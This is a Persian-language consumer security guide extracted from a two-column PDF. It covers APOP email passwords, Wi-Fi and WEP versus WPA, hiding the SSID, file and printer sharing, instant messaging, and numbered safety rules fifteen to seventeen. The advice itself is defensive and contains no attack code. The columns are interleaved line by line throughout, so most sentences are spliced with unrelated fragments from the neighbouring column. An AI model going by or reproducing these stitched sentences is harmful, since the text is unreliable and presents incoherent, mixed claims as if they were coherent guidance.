.(SSLﺍﮔﺮ ﺍﺯ ﭘـﺴﺖ ﺍﻟﻜﺘﺮﻭﻧﻴﻜـﻲ ﻣﺒﺘﻨـﻲ ﺑـﺮ POPﺍﺳـﺘﻔﺎﺩﻩ ﺳﻮﺀ ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﺭﺍﻳﺎﻧﻪﻫﺎﻱ ﺷﺨﺼﻲ. •
ﻣﻲ ﻛﻨﻴﺪ ﺑﺎﻳﺪ ﮔﺰﻳﻨﺔ APOPﺭﺍ ﺍﻧﺘﺨـﺎﺏ ﻧﻤﺎﻳﻴـﺪ ﺗـﺎ ﺭﻣﺰﻫـﺎﻱ ﺍﺳﺘﺜﻨﺎﻱ ﺍﺻﻠﻲ ﺩﺭ ﺍﻳﻦ ﻣﻮﺿﻮﻉ "ﺍﻧﺘﻘﺎﻝ ﺑﻲﺳـﻴﻢ" ﺍﺳـﺖ ﻛـﻪ ﺩﺭ
ﻋﺒﻮﺭ ﻗﺒﻞ ﺍﺯ ﺍﺭﺳﺎﻝ ﺭﻣﺰﮔﺬﺍﺭﻱ ﺷﻮﻧﺪ .ﺍﻳﻦ ﻭﻳﮋﮔﻲ -ﻣـﺴﺘﻘﻞ ﺍﺯ ﺑﺨﺶ ﺑﻌﺪﻱ ﺑﺮﺭﺳﻲ ﺧﻮﺍﻫﺪ ﺷﺪ.
ﺭﺳﺎﻧﺔ ﺍﻧﺘﻘﺎﻝ -ﺍﻣﻨﻴﺖ ﭘﺎﻳﺎﻧﻪ ﺑﻪ ﭘﺎﻳﺎﻧﻪ ٩٥ﺭﺍ ﺑﺮﺁﻭﺭﺩﻩ ﻣﻲﻛﻨﺪ .ﺍﮔـﺮ
٩٣
ﺳﺮﻭﻳﺲﺩﻫﻨﺪﻩ ﺍﺯ ﺭﻣﺰﮔﺬﺍﺭﻱ ﺍﺳﺘﻔﺎﺩﻩ ﻧﻜﻨﺪ ﺑﺎﻳﺪ ﺍﺯ ﻣﺤﺪﻭﺩﻳﺘﻬﺎﻱ ﺳﻴﺎﺳﺘﻬﺎﻱ ﺣﺮﻳﻢ ﺧﺼﻮﺻﻲ
ﻓﻨﺎﻭﺭﻱ ﺁﮔﺎﻩ ﺑﺎﺷﻴﺪ ﻭ ﺩﺭﺻﻮﺭﺕ ﻟـﺰﻭﻡ ﺗـﺼﻤﻴﻢ ﺑﮕﻴﺮﻳـﺪ ﻛـﻪ ﺍﺯ ﺑﺴﻴﺎﺭﻱ ﺍﺯ ﭘﺎﻳﮕﺎﻫﻬﺎﻱ ﻭﺏ ﺑﺮﺍﻱ ﺣﻔﺎﻇﺖ ﺍﺯ ﺣـﺮﻳﻢ ﺧـﺼﻮﺻﻲ
ﺍﺭﺗﺒﺎﻁ ﭼﮕﻮﻧﻪ ﺍﺳﺘﻔﺎﺩﻩ ﻛﻨﻴﺪ. ﺍﻓﺮﺍﺩ ،ﺳﻴﺎﺳﺘﻬﺎﻱ ﺍﻋﻼﻡ ﺷﺪﻩ ﺩﺍﺭﻧـﺪ .ﺍﻳـﻦ ﺳﻴﺎﺳـﺘﻬﺎ ﻣـﺸﺨﺺ
ﻣﻲﻛﻨﻨﺪ ﻛﻪ ﭼـﻪ ﻧـﻮﻉ ﺍﻃﻼﻋـﺎﺗﻲ ﺭﺍ ﻣـﻲﺗـﻮﺍﻥ ﺩﺭ ﭘﺎﻳﮕـﺎﻩ ﻭﺏ
ﺟﻤﻊﺁﻭﺭﻱ ﻧﻤﻮﺩ ،ﺑﺎ ﺁﻥ ﺩﺍﺩﻩﻫﺎ ﭼﻪ ﻛﺎﺭﻱ ﺭﺍ ﻣﻲﺗﻮﺍﻥ ﻳﺎ ﻧﻤﻲﺗﻮﺍﻥ
ﺍﺳﺘﻔﺎﺩﻩ ﻗﺮﺍﺭ ﮔﻴﺮﻧﺪ .ﺑﺴﻴﺎﺭﻱ ﺍﺯ ﻓﻨﺎﻭﺭﻳﻬﺎﻱ ﺗﻠﻔﻦ ﺳﻴﺎﺭ ﻣﻲﺗﻮﺍﻧﻨـﺪ 802.11ﻳﺎ Wi-Fi
ﻣﻮﺭﺩ ﺍﺳﺘﺮﺍﻕ ﺳﻤﻊ ﻭ ﺷﻨﻮﺩ ﻗﺮﺍﺭ ﺑﮕﻴﺮﻧﺪ ﻭ ﻟﺬﺍ ﺍﻳﻤﻦ ﻧﻤﻲﺑﺎﺷﻨﺪ.
802.11ﻣﺠﻤﻮﻋﻪﺍﻱ ﺍﺯ ﺍﺳﺘﺎﻧﺪﺍﺭﺩﻫﺎﻱ ﺩﺭﺣﺎﻝ ﺗﻮﺳـﻌﺔ IEEE
ﺧﻄﻮﻁ ﺩﻭﺭ ﺑﺮﺩ ﺑﺮﺍﻱ ﺷﺒﻜﻪﻫﺎﻱ ﻣﺤﻠﻲ ﺑـﻲﺳـﻴﻢ ٩٦ﻣـﻲﺑﺎﺷـﺪ 802.11 .ﻛـﻪ
ﻣﻌﻤﻮ ﹰﻻ ٩٧Wi-Fiﻧﺎﻣﻴﺪﻩ ﻣـﻲﺷـﻮﺩ ،ﺑﻌﻨـﻮﺍﻥ ﺟـﺎﻳﮕﺰﻳﻦ ﺍﺗﺮﻧـﺖ
ﻻ ﺑـﺎ
ﺍﺭﺗﺒﺎﻃﺎﺕ ﻃﻮﻻﻧﻲ ﺧﺼﻮﺻﹰﺎ ﺑﺮﺍﻱ ﻣﻨﺎﻃﻖ ﺩﻭﺭﺩﺳﺖ ﻣﻌﻤـﻮ ﹰ ﺳﻴﻤﻲ ٩٨ﺑﺮﺍﻱ ﺍﺗﺼﺎﻝ ﺭﺍﻳﺎﻧﻪﻫﺎﻱ ﺧﺎﻧﮕﻲ ﻭ ﺭﺍﻳﺎﻧـﻪﻫـﺎﻱ ﻛﻴﻔـﻲ
ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﻓﻨﺎﻭﺭﻳﻬﺎﻱ ﺑـﻲﺳـﻴﻢ ﻣﻬﻴـﺎ ﻣـﻲﺷـﻮﺩ .ﺍﻳـﻦ ﺧﻄـﻮﻁ ﻣﺤﺒﻮﺑﻴﺖ ﻳﺎﻓﺘﻪ ﻭ ﻣـﺰﻳﺘﺶ ﺍﺭﺯﺍﻥ ﺑـﻮﺩﻥ ﻭ ﺳـﺮﻋﺖ ﻧـﺴﺒﻲ ﺁﻥ
ﻣﻲ ﺗﻮﺍﻧﻨﺪ ﺑﻪ ﭼﻨﺪﻳﻦ ﻛﺎﺭﺑﺮ ﺑﻄﻮﺭ ﻫﻤﺰﻣﺎﻥ ﺧﺪﻣﺎﺕ ﺍﺭﺍﺋـﻪ ﺩﻫﻨـﺪ. ﺍﺳﺖ.
ﺑﺨﺶ ﺩﻭﻡ
٩٩ ﺍﮔﺮ ﺑﺨﻮﺍﻫﻴﺪ ﺍﺭﺗﺒﺎﻁ ﺷﺒﻜﻪﺍﻱ ﺧـﻮﺩ ﺭﺍ ﺑـﺎ ﻓـﺮﺩ ﺩﻳﮕـﺮﻱ •
ﺗﻠﻔﻨﻬﺎﻱ ﺑﻲﺳﻴﻢ ﺣﻠﻘﺔ ﻣﺤﻠﻲ
ﺑﻪﺍﺷﺘﺮﺍﻙ ﺑﮕﺬﺍﺭﻳﺪ ،ﺑﺎﻳﺪ ﻧـﺎﻡ ﺷـﺒﻜﺔ ﺧـﻮﺩ ) (SSIDﺭﺍ ﺍﺯ
ﺍﻳــﻦ ﻓﻨــﺎﻭﺭﻱ ﺩﺭ ﻣﻨــﺎﺯﻝ ﻭ ﺍﺩﺍﺭﺍﺕ ﺑــﺴﻴﺎﺭﻱ ﺍﺯ ﻛــﺸﻮﺭﻫﺎ ﺑﻜــﺎﺭ ﺣﺎﻟﺖ ﭘﻴﺶﻓﺮﺽ ﺗﻐﻴﻴﺮ ﺩﻫﻴﺪ ﻭ ﺁﻧﺮﺍ ﻃﻮﺭﻱ ﺗﻨﻈﻴﻢ ﻛﻨﻴـﺪ
ﻣﻲﺭﻭﺩ ﻭ ﻧﺼﺐ ﻛﻢﻫﺰﻳﻨﻪ ﻭ ﺑﻲﻧﻘـﺺ ﺧﻄـﻮﻁ ﺗﻠﻔـﻦ ﺭﺍ ﻣﻴـﺴﺮ ﻛﻪ ﻧﺎﻡ ﺁﻥ ﺑﺮﺍﻱ ﺍﻓﺮﺍﺩ ﻏﻴـﺮ ﻣﺠـﺎﺯ ﻗﺎﺑـﻞ ﺭﺅﻳـﺖ ﻧﺒﺎﺷـﺪ.
ﻣﻲﺳﺎﺯﺩ ﻭ ﻣﺸﻜﻼﺗﻲ ﻛﻪ ﺗﺠﻬﻴﺰﺍﺕ ﺯﻳﺮﺳﺎﺧﺘﻬﺎﻱ ﺳﻴﻤﻲ ﺩﺍﺭﻧـﺪ ﺩﺭﺻﻮﺭﺕ ﺍﻧﺠﺎﻡ ﺍﻳﻨﻜﺎﺭ ﺗﻨﻬﺎ ﺍﻓﺮﺍﺩﻱ ﻛﻪ SSIDﺭﺍ ﻣـﻲ-
ﺭﺍ ﻧﺪﺍﺭﺩ .ﺍﺯ ﻃﺮﻑ ﺩﻳﮕﺮ ﺑـﺮﺧﻼﻑ ﺳـﻴﻤﻬﺎﻱ ﻣـﺴﻲ ،ﺗﺠﻬﻴـﺰﺍﺕ ﺩﺍﻧﻨﺪ ﺧﻮﺍﻫﻨﺪ ﺗﻮﺍﻧﺴﺖ ﺁﻥ ﺍﺭﺗﺒﺎﻁ ﺷﺒﻜﻪﺍﻱ ﺭﺍ ﺑﺒﻴﻨﻨﺪ.
ﺑﻲﺳﻴﻢ ﺩﺭ ﻣﻴﺎﻧـﺔ ﺭﺍﻩ ﻗﺎﺑـﻞ ﺩﺯﺩﻳـﺪﻥ ﻭ ﻓـﺮﻭﺧﺘﻦ ﻧﻴـﺴﺘﻨﺪ ،ﺍﻣـﺎ
ﺍﻟﮕﻮﺭﻳﺘﻢ ﺭﻣﺰﻧﮕﺎﺭﻱ ﺁﻥ ) (WEPﺿﻌﻴﻒ ﺍﺳﺖ ﻭ ﺑﺴﺎﺩﮔﻲ •
ﻫﻤﺎﻧﻨﺪ ﺗﻠﻔﻨﻬﺎﻱ ﺳﻴﻤﻲ ﻫﻨﮕﺎﻣﻴﻜﻪ ﻳﻚ ﻣﻮﺩﻡ ﺑـﻪ ﺍﻳـﻦ ﺧﻄـﻮﻁ
ﻣﻲ ﺗﻮﺍﻧﺪ ﺷﻜﺴﺘﻪ ﺷﻮﺩ .ﺑﺎ ﺍﻳﻦ ﻭﺟﻮﺩ ﺩﺭ ﻏﻴﺎﺏ ﺭﻭﺷـﻬﺎﻱ
ﻣﺘﺼﻞ ﻣﻲﺷﻮﺩ ﻣﻲﺗﻮﺍﻧﻨﺪ ﺑﺠﺎﻱ ﺍﻃﻼﻋﺎﺕ ﺻﻮﺗﻲ ،ﺳـﺎﻳﺮ ﺍﻧـﻮﺍﻉ
ﺑﻬﺘﺮ ﻣﻲﺗﻮﺍﻧﻴﺪ ﺁﻧﺮﺍ ﻓﻌﺎﻝ ﺳﺎﺯﻳﺪ .ﺑﻪ ﻳﺎﺩ ﺩﺍﺷﺘﻪ ﺑﺎﺷﻴﺪ ﻛـﻪ
ﺍﻃﻼﻋﺎﺕ ﺭﺍ ﺍﻧﺘﻘﺎﻝ ﺩﻫﻨﺪ .ﻓﻨﺎﻭﺭﻱ ﺑﻲﺳﻴﻢ ﻣﻤﻜـﻦ ﺍﺳـﺖ ﻗﺎﺑـﻞ
ﺍﮔﺮ ﻓﺮﺩﻱ ﻭﺍﻗﻌﹰﺎ ﺑﺨﻮﺍﻫﺪ ﺍﻧﺘﻘﺎﻝ ﺍﻃﻼﻋﺎﺕ ﺷﻤﺎ )ﻣﺎﻧﻨﺪ ﺭﻣـﺰ
ﺷﻨﻮﺩ ﺑﺎﺷـﺪ .ﺑـﺴﺘﻪ ﺑـﻪ ﻣﻮﻗﻌﻴـﺖ ﻣﺤﻠـﻲ ،ﻗـﻮﺍﻧﻴﻦ ﻛـﺸﻮﺭﻱ ﻭ
ﻋﺒــﻮﺭ( ﺭﺍ ﺑﺮﺭﺳــﻲ ﻛﻨــﺪ ﺍﺳــﺘﻔﺎﺩﻩ ﺍﺯ ﺍﻳــﻦ ﺭﻭﺵ ﺑــﺴﻴﺎﺭ
ﻣﻘﺮﺭﺍﺕ ﻣﺤﻠﻲ ﻣﻲﺗﻮﺍﻧﻴـﺪ ﺍﺯ ISPﺧـﻮﺩ ﺩﺭﺧﻮﺍﺳـﺖ ﻛﻨﻴـﺪ ﻛـﻪ
ﺁﺳﻴﺐﭘﺬﻳﺮ ﺧﻮﺍﻫﺪ ﺑﻮﺩ .ﺍﻟﺒﺘﻪ ﻳﻚ ﺭﻭﺵ ﺟﺪﻳﺪ ﺭﻣﺰﻧﮕﺎﺭﻱ
ﺭﻣﺰﮔﺬﺍﺭﻱﺷﺪﻥ ﺍﺭﺗﺒﺎﻁ ﺭﺍ ﺑﺮﺭﺳﻲ ﻧﻤﺎﻳﺪ.
) (WPAﻭﺟــﻮﺩ ﺩﺍﺭﺩ ﻛــﻪ ﻛﺎﺳــﺘﻴﻬﺎﻱ WEPﺭﺍ ﺭﻓــﻊ
ﺳﺎﻳﺮ ﻣﺴﺎﺋﻞ ﺍﻳﻨﺘﺮﻧﺘﻲ ﻣﻲﻛﻨﺪ ﻭ ﺩﺭ ﺗﺠﻬﻴﺰﺍﺕ ﺟﺪﻳﺪﺗﺮ ﻗﺎﺑﻞ ﺍﺳﺘﻔﺎﺩﻩ ﻣـﻲﺑﺎﺷـﺪ.
ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﺍﻳﻦ ﺭﻭﺵ ﺩﺭ ﺷﺒﻜﻪﻫﺎﻱ ﻣﺒﺘﻨـﻲ ﺑـﺮ Wi-Fi
ﺍﺷﺘﺮﺍﻙ ﻓﺎﻳﻞ ﺍﻛﻴﺪﹰﺍ ﺗﻮﺻﻴﻪ ﻣﻲﺷﻮﺩ.
ﻋﺒﻮﺭ ﺷﻤﺎ ﺭﺍ ﻗﺎﺩﺭ ﻣﻲﻛﻨﻨﺪ ﺑﺘﻮﺍﻧﻴﺪ ﺁﻧﭽﻪ ﻛﻪ ﻳـﻚ ﻛـﺎﺭﺑﺮ ﺍﻧﺠـﺎﻡ ﺍﺗﺎﻕ ﻳﺎ ﻫﺮﻛﺪﺍﻡ ﺩﺭ ﻳﻚ ﻧﻴﻤﻜﺮﺓ ﺯﻣﻴﻦ ﺑﺎﺷﻨﺪ .ﺍﺷﺘﺮﺍﻙ ﻓﺎﻳﻞ ﺍﻳﻦ
ﻣﻲﺩﻫﺪ )ﺧﻮﺍﻧﺪﻥ ،ﻧﻮﺷﺘﻦ ،ﺍﻳﺠﺎﺩ ﻭ ﭘـﺎﻙ ﻧﻤـﻮﺩﻥ( ﺭﺍ ﻛﻨﺘـﺮﻝ ﻧﻤﺎﻳﻴـﺪ. ﺍﻣﻜﺎﻥ ﺭﺍ ﻓﺮﺍﻫﻢ ﻣﻲﺳﺎﺯﺩ ﻛـﻪ ﺩﺭ ﻃـﻮﻝ ﻣـﺴﺎﻓﺮﺗﻬﺎ ﺑﺘﻮﺍﻧﻴـﺪ ﺑـﻪ
ﺑﺴﻴﺎﺭﻱ ﺍﺯ ﺳﻴﺴﺘﻤﻬﺎ ﻣﻲﺗﻮﺍﻧﻨـﺪ ﺗﻤـﺎﻣﻲ ﺍﻋﻤـﺎﻝ ﻳـﻚ ﻛـﺎﺭﺑﺮ ﺭﺍ ﻓﺎﻳﻠﻬﺎﻱ ﺭﺍﻳﺎﻧﺔ ﺧﻮﺩ ﺩﺳﺘﺮﺳﻲ ﺩﺍﺷﺘﻪ ﺑﺎﺷﻴﺪ.
ﻛﻨﺘﺮﻝ ﻧﻤﺎﻳﻨﺪ .ﺑﻌﻨﻮﺍﻥ ﻣﺜﺎﻝ ﻣﻲﺗﻮﺍﻧﻴﺪ ﺗﺴﻬﻴﻼﺕ ﺩﺳﺘﺮﺳﻲ ﺍﺯ ﺭﺍﻩ ﻳﻚ ﺭﺍﻳﺎﻧﺔ ﻣﻨﻔﺮﺩ ﻛﻪ ﺑﻌﻨـﻮﺍﻥ ﺳـﺮﻭﻳﺲﺩﻫﻨـﺪﺓ ﻓﺎﻳـﻞ ١٠٠ﻋﻤـﻞ
ﺩﻭﺭ ﺭﺍ ﺑﮕﻮﻧــﻪﺍﻱ ﻣﺤــﺪﻭﺩ ﺳــﺎﺯﻳﺪ ﻛــﻪ ﺑــﻪ ﻓﺎﻳﻠﻬــﺎ ﺗﻨﻬــﺎ ﺍﺟــﺎﺯﺓ ﻣﻲﻛﻨﺪ ﻣﻲﺗﻮﺍﻧﺪ ﺑﻌﻨﻮﺍﻥ ﺩﻳﺴﻚ ﺳﺨﺖ ﺗﻌﺪﺍﺩ ﺯﻳﺎﺩﻱ ﺭﺍﻳﺎﻧﻪ ﺗﻠﻘﻲ
ﺧﻮﺍﻧﺪﻩﺷﺪﻥ ﺑﺪﻫﺪ .ﺑﻪ ﻋﺒﺎﺭﺕ ﺩﻳﮕﺮ ﺍﮔـﺮ ﻧﻴـﺎﺯﻱ ﺑـﻪ ﺩﺳﺘﺮﺳـﻲ ﮔﺮﺩﺩ .ﺩﺭ ﺍﻳﻨﺼﻮﺭﺕ ﺑﻴﺸﺘﺮ ﻓﺎﻳﻠﻬـﺎﻱ ﺷـﻤﺎ ﺩﺭ ﺳـﺮﻭﻳﺲ ﺩﻫﻨـﺪﺓ
ﻧﻮﺷﺘﻦ ﻧﺪﺍﺭﻳﺪ ﺑﺎﻳﺪ ﺁﻧﺮﺍ ﻏﻴﺮ ﻓﻌﺎﻝ ﻛﻨﻴﺪ. ﻓﺎﻳﻞ ﻗﺮﺍﺭ ﻣﻲﮔﻴﺮﻧﺪ ﻭ ﺑﻨﺎﺑﺮﺍﻳﻦ ﻣﻲﺗﻮﺍﻧﻴﺪ ﺍﺯ ﻃﺮﻳﻖ ﺷﺒﻜﻪ ﺑﻪ ﺁﻧﻬﺎ
ﺳﻴﺴﺘﻤﻬﺎﻳﻲ ﻛﻪ ﺍﺯ ﺑﻌﻀﻲ ﻗﺎﺑﻠﻴﺘﻬﺎﻱ ﺍﺷﺘﺮﺍﻙ ﻓﺎﻳﻠﻬـﺎ ﭘـﺸﺘﻴﺒﺎﻧﻲ ﺩﺳﺖ ﻳﺎﺑﻴﺪ.
ﻣﻲﻛﻨﻨﺪ ﻣﻲﺗﻮﺍﻧﻨﺪ ﭼﺎﭘﮕﺮﻫﺎ ﺭﺍ ﻧﻴﺰ ﺑﻪ ﺍﺷﺘﺮﺍﻙ ﺑﮕﺬﺍﺭﻧـﺪ .ﺍﮔﺮﭼـﻪ ﺁﺳﻴﺐﭘﺬﻳﺮﻱ ﻭﺍﺿﺤﻲ ﻛﻪ ﺩﺭ ﺍﻳﻨﺠﺎ ﻭﺟﻮﺩ ﺩﺍﺭﺩ ﺍﻳﻦ ﺍﺳﺖ ﻛﻪ ﺍﮔﺮ
ﺍﻣﻜﺎﻥ ﺩﺳﺘﺮﺳﻲ ﺭﺍﻩ ﺩﻭﺭ ﺑﻪ ﭼﺎﭘﮕﺮ ﭼﻨﺪﺍﻥ ﭘﺮﻣﺨﺎﻃﺮﻩ ﻧﻴﺴﺖ ،ﺍﻣﺎ ﺷﻤﺎ ﺑﺘﻮﺍﻧﻴﺪ ﺑﻪ ﻓﺎﻳﻠﻬﺎﻱ ﺧﻮﺩ ﺍﺯ ﺭﺍﻩ ﺩﻭﺭ ﺩﺳﺖ ﭘﻴﺪﺍ ﻛﻨﻴـﺪ ،ﺍﻓـﺮﺍﺩ
ﺑﻬﺘﺮ ﺍﺳﺖ ﻛﻪ ﺁﻧﺮﺍ ﻏﻴﺮﻓﻌﺎﻝ ﺳﺎﺯﻳﻢ ﻣﮕﺮ ﺁﻧﻜـﻪ ﺿـﺮﻭﺭﻱ ﺑﺎﺷـﺪ.
ﺩﻳﮕﺮ ﻧﻴﺰ ﻣﻲﺗﻮﺍﻧﻨﺪ ﺍﻳﻨﻜﺎﺭ ﺭﺍ ﺍﻧﺠﺎﻡ ﺩﻫﻨـﺪ .ﻳـﻚ ﺁﺳـﻴﺐﭘـﺬﻳﺮﻱ
ﻣﻤﻜﻦ ﺍﺳﺖ ﺍﺷﻜﺎﻟﻲ ﺩﺭ ﺩﺳﺘﺮﺳﻲ ﺭﺍﻩ ﺩﻭﺭ ﭼﺎﭘﮕﺮ ﻭﺟﻮﺩ ﺩﺍﺷـﺘﻪ
ﺿﻌﻴﻔﺘﺮ ﺍﻳﻦ ﺍﺳﺖ ﻛﻪ ﺍﮔـﺮ ﻓﺎﻳﻠﻬـﺎ ﺭﺍ ﺑـﺎ ﺩﻳﮕـﺮﺍﻥ ﺑـﻪ ﺍﺷـﺘﺮﺍﻙ
ﺑﺎﺷﺪ ﻛﻪ ﺑﺎﻋﺚ ﺷﻮﺩ ﻣﺠﻮﺯﻫﺎﻳﻲ ﻛﻪ ﺍﺧﺘـﺼﺎﺻﹰﺎ ﺑـﺮﺍﻱ ﻛﺎﺭﻫـﺎﻱ
ﺑﮕﺬﺍﺭﻳﺪ ،ﺩﺭ ﺑﺮﺍﺑﺮ ﺁﺳﻴﺐ ﭘﺬﻳﺮﻳﻬﺎﻳﻲ ﻛﻪ ﻣﻤﻜﻦ ﺍﺳﺖ ﺑﺮﺍﻱ ﺭﺍﻳﺎﻧﺔ
ﭼﺎﭘﻲ ﺻﺎﺩﺭ ﺷﺪﻩ ،ﺍﻣﻜﺎﻥ ﺍﻋﻤﺎﻝ ﺧﺮﺍﺑﻜﺎﺭﺍﻧﻪ ﺭﺍ ﻓﺮﺍﻫﻢ ﻛﻨﻨﺪ. ﻼ ﺍﮔﺮ ﺭﺍﻳﺎﻧﻪﺍﻱ ﻛـﻪ ﺑـﻪﺁﻧﻬﺎ ﭘﻴﺶ ﺁﻳﺪ ﺩﺭ ﺍﻣﺎﻥ ﻧﺨﻮﺍﻫﻴﺪ ﺑﻮﺩ .ﻣﺜ ﹰ
ﻓﺎﻳﻠﻬﺎﻱ ﺷﻤﺎ ﺩﺳﺘﺮﺳﻲ ﺩﺍﺷﺘﻪ ﺗﻮﺳﻂ ﻳﻚ ﻭﻳﺮﻭﺱ ﺁﻟﻮﺩﻩ ﺷـﻮﺩ،
ﭘﻴﺎﻣﻬﺎﻱ ﻓﻮﺭﻱ
ﻣﻤﻜﻦ ﺍﺳﺖ ﻓﺎﻳﻠﻬﺎﻱ ﺷﻤﺎ ﻧﻴﺰ ﺁﻟﻮﺩﻩ ﮔﺮﺩﻧﺪ.
ﻗﺎﺑﻠﻴﺖ ﺍﺭﺳﺎﻝ ﭘﻴﺎﻡ ﻓﻮﺭﻱ ﺍﻳﻦ ﺍﻣﻜﺎﻥ ﺭﺍ ﻓﺮﺍﻫﻢ ﻣﻲﺳﺎﺯﺩ ﻛﻪ ﭘﻴﺎﻡ
ﺗﺎﻳﭗﺷﺪﻩ ﺭﻭﻱ ﻳﻚ ﺭﺍﻳﺎﻧﻪ ﻫﻤﺰﻣﺎﻥ ﺭﻭﻱ ﺭﺍﻳﺎﻧﻪ ﻫﺎﻱ ﺩﻳﮕـﺮ ﺑـﻪ ﻗﺎﻧﻮﻥ ﭘﺎﻧﺰﺩﻫﻢ:
ﻧﻤــﺎﻳﺶ ﺩﺭﺁﻳــﺪ .ﺑــﺮﺧﻼﻑ ﭘــﺴﺖ ﺍﻟﻜﺘﺮﻭﻧﻴﻜــﻲ ،ﺩﺭ ﺍﻳــﻦ ﻣــﻮﺭﺩ ﺍﮔﺮ ﺍﺯ ﻗﺎﺑﻠﻴﺖ ﺍﺷﺘﺮﺍﻙ ﻓﺎﻳﻞ ﺍﺳﺘﻔﺎﺩﻩ ﻧﻤﻲﻛﻨﻴـﺪ ﺁﻧـﺮﺍ
ﻓﺮﺳﺘﻨﺪﻩ ﻭ ﮔﻴﺮﻧﺪﻩ ﺑﺎﻳﺪ ﻫﺮ ﺩﻭ ﺩﺭ ﻳﻚ ﺯﻣﺎﻥ ﻣﺘﺼﻞ ﺑـﻪ ﺷـﺒﻜﻪ ﻏﻴﺮﻓﻌﺎﻝ ﺳﺎﺯﻳﺪ .ﺩﺭﺻﻮﺭﺕ ﻧﻴﺎﺯ ﺑﻪ ﺁﻥ ،ﺩﺳﺘﺮﺳﻴﻬﺎﻱ
ﺑﺎﺷﻨﺪ .ﻗﺎﺑﻠﻴﺖ ﺍﺭﺳﺎﻝ ﭘﻴﺎﻡ ﻓﻮﺭﻱ ﻧﺮﻡﺍﻓﺰﺍﺭﻫﺎﻱ ﻣﺘﻔﺎﻭﺗﻲ ﺩﺍﺭﺩ .ﺩﺭ ﺧﻮﺩ ﺭﺍ ﺑﻪ ﺁﻧﭽﻪ ﻛﻪ ﻭﺍﻗﻌ ﹰﺎ ﻻﺯﻡ ﺩﺍﺭﻳﺪ ﻣﺤﺪﻭﺩ ﻧﻤﺎﻳﻴﺪ.
ﻣﻴــﺎﻥ ﺁﻧﻬــﺎ ﻣــﻲﺗــﻮﺍﻥ ﺑــﻪ ،١٠١IRC ،MSN Messenger
،١٠٢AIM ،Yahoo Chatﻭ ﻧﻴﺰ ١٠٣ICQﺍﺷﺎﺭﻩ ﻧﻤﻮﺩ. ﻗﺎﻧﻮﻥ ﺷﺎﻧﺰﺩﻫﻢ:
ﺍﺭﺗﺒﺎﻃـــﺎﺕ ﺍﻳﻨﺘﺮﻧﺘـــﻲ ﺍﺯ ﻗﺒﻴـــﻞ ،Yahoo ،MSN ،AOL ﺍﮔﺮ ﺍﺯ ﻗﺎﺑﻠﻴﺖ ﺍﺷﺘﺮﺍﻙ ﻓﺎﻳﻞ ﺍﺳﺘﻔﺎﺩﻩ ﻣﻲﻛﻨﻴـﺪ ،ﻧـﺎﻡ
ﻣﻴﺰﺑﺎﻧﻬﺎﻱ ﺑﺎﺯﻳﻬﺎﻱ ﺍﻳﻨﺘﺮﻧﺘﻲ ﻭ ...ﻫﺮﻳﻚ ﺩﺍﺭﺍﻱ Messenger ﻛﺎﺭﺑﺮﻱ ﻭ ﺭﻣﺰﻫﺎﻱ ﻋﺒﻮﺭ ﻣـﺴﺘﺤﻜﻢ ﺑﻜـﺎﺭ ﮔﻴﺮﻳـﺪ ﻭ
ﻭ Chatﻣﺨﺼﻮﺹ ﺑﻪ ﺧﻮﺩ ﻫﺴﺘﻨﺪ .ﺑﻌﻀﻲ ﺍﺯ ﺁﻧﻬﺎ ﺑـﺎ ﺳـﺎﻳﺮﻳﻦ ﻣﺠﻮﺯ ﺩﺳﺘﺮﺳـﻲ ﺭﺍ ﺑـﻪ ﻛﻤﺘـﺮﻳﻦ ﺣـﺪ ﻣﻤﻜـﻦ ﻛـﻪ
ﺗﺒﺎﺩﻝ ﺍﻃﻼﻋﺎﺕ ﻣﻲ ﻛﻨﻨﺪ ﻭ ﺑﺮﺧﻲ ﺩﻳﮕـﺮ ﭼﻨـﻴﻦ ﻛـﺎﺭﻱ ﺍﻧﺠـﺎﻡ ﻫﻤﭽﻨﺎﻥ ﺑﺎ ﺁﻥ ﻣﻲﺗﻮﺍﻧﻴﺪ ﻛﺎﺭ ﺧـﻮﺩ ﺭﺍ ﺍﻧﺠـﺎﻡ ﺩﻫﻴـﺪ
ﻧﻤﻲﺩﻫﻨﺪ. ﻣﺤﺪﻭﺩ ﺳﺎﺯﻳﺪ.
ﺑﺴﻴﺎﺭﻱ ﺍﺯ ﺳﻴﺴﺘﻤﻬﺎﻱ ﺍﺭﺳـﺎﻝ ﭘﻴـﺎﻡ ﻓـﻮﺭﻱ ﺑـﻪ ﻛـﺎﺭﺑﺮ ﺍﺟـﺎﺯﻩ
ﻗﺎﻧﻮﻥ ﻫﻔﺪﻫﻢ:
ﻣﻲﺩﻫﻨﺪ ﺍﺳﻤﻲ ﺍﻧﺘﺨﺎﺏ ﻛﻨﺪ ﻛﻪ ﻫﻤﺮﺍﻩ ﭘﻴﺎﻣﻬﺎﻱ ﺍﺭﺳﺎﻟﻲﺍﺵ ﺑـﻪ
ﺍﮔﺮ ﻓﺎﻳﻠﻬﺎ ﺭﺍ ﺑﺎ ﺩﻳﮕـﺮﺍﻥ ﺑـﻪ ﺍﺷـﺘﺮﺍﻙ ﻣـﻲﮔﺬﺍﺭﻳـﺪ
ﻧﻤﺎﻳﺶ ﺩﺭﺁﻳﺪ ﻭ ﺑﺪﻳﻦ ﺗﺮﺗﻴﺐ ﺳﺎﻳﺮﻳﻦ ﻧﻴﺰ ﺑﺘﻮﺍﻧﻨﺪ ﺑـﺮﺍﻱ ﺍﻭ ﭘﻴـﺎﻡ
ﻣﻄﻤﺌﻦ ﺷﻮﻳﺪ ﺁﻧﻬﺎ ﻣﺴﺎﺋﻞ ﺍﻣﻨﻴﺘﻲ ﺭﺍ ﺟﺪﻱ ﻣﻲﮔﻴﺮﻧﺪ.
ﺍﺭﺳﺎﻝ ﻧﻤﺎﻳﻨﺪ .ﺍﻳﻦ ﺍﺳﺎﻣﻲ ﻣﻤﻜﻦ ﺍﺳﺖ ﻣﻮﺟﺐ ﺷﻮﻧﺪ ﻛﻪ ﻫﻮﻳﺖ
